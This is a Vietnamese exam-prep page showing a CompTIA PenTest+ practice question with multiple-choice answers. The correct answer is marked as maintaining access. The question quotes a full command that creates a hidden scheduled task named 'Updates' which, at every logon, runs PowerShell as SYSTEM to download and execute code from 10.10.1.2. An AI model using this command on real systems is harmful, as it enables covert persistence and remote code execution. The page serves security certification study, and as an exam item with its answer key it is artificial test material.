Câu 60: PT0-003: CompTIA PenTest+
A tester obtained access to a computer using a SMB exploit and now has a shell access into the target computer. The tester runs the following on the obtained shell:schtask /create /tn Updates /tr "C:\windows\syswow64\Windows\WindowsPowershell\v1.0\powershell.exe hidden -NoLogo -NoInteractive -ep bypass -nop -c 'IEX ((…
Nội dung câu hỏi
A tester obtained access to a computer using a SMB exploit and now has a shell access into the target computer. The tester runs the following on the obtained shell:schtask /create /tn Updates /tr "C:\windows\syswow64\Windows\WindowsPowershell\v1.0\powershell.exe hidden -NoLogo -NoInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('http://10.10.1.2/asd')))'" /sc onlogon /ru SystemWhich of the following does this action accomplish?
Các lựa chọn
Đáp án được giữ gọn theo nhãn A, B, C, D trong phần bình chọn tương tác.
- A. Upgrades the shell performing a privilege escalation activity
- B. Uses the Windows Update service to move the shell connection and avoid detection
- C. Maintains access into the compromised computer — đáp án hiện tại
- D. Forwards all the communication from the compromised host to the host 10.10.1.2
Cộng đồng
0 bình luận công khai. Tên thành viên được ẩn một phần.